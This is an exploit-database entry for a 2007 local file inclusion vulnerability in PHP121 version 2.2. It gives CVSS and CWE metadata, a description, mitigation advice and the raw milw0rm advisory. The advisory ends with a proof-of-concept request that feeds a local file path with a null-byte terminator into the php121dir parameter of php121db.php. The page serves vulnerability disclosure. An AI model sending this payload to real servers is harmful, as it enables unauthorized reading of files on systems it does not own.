header-logo
Suggest Exploit
vendor:
PHP121
by:
Dj7xpl
5.5
CVSS
MEDIUM
Local File Inclusion Vulnerability
22
CWE
Product Name: PHP121
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: NO
Related CWE:
CPE: php121:2.2
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP121 Version 2.2

The vulnerability allows an attacker to include local files by exploiting the php121db.php script. The attacker can specify a local file in the php121dir parameter, which is not properly sanitized, leading to arbitrary file inclusion. The vulnerability can be exploited by sending a crafted request to the vulnerable server.

Mitigation:

To mitigate the vulnerability, it is recommended to sanitize user input before using it in file inclusion operations. Additionally, access controls should be implemented to prevent unauthorized access to sensitive files.
Source

Exploit-DB raw data:

                         +========================I=R=A=N============================+

                                             PHP121 Version 2.2 

                         =========================I=R=A=N=============================

                         +========================I=R=A=N============================+

                         Author :

                         Dj7xpl / Dj7xpl[at]Yahoo[dot]com

                         =========================I=R=A=N=============================

                         +========================I=R=A=N============================+

                         Type :

                         Local File Inclusion Vulnerability 

                         =========================I=R=A=N=============================

                         +========================I=R=A=N============================+

                         Download :

                         http://www.php121.com/download.php

                         =========================I=R=A=N=============================

                         +========================I=R=A=N============================+

                         Bug :

                         http://[Target]/[Path]/php121db.php?php121dir=[ Local File ]%00

                         =========================I=R=A=N=============================

# milw0rm.com [2007-04-09]
cqrsecured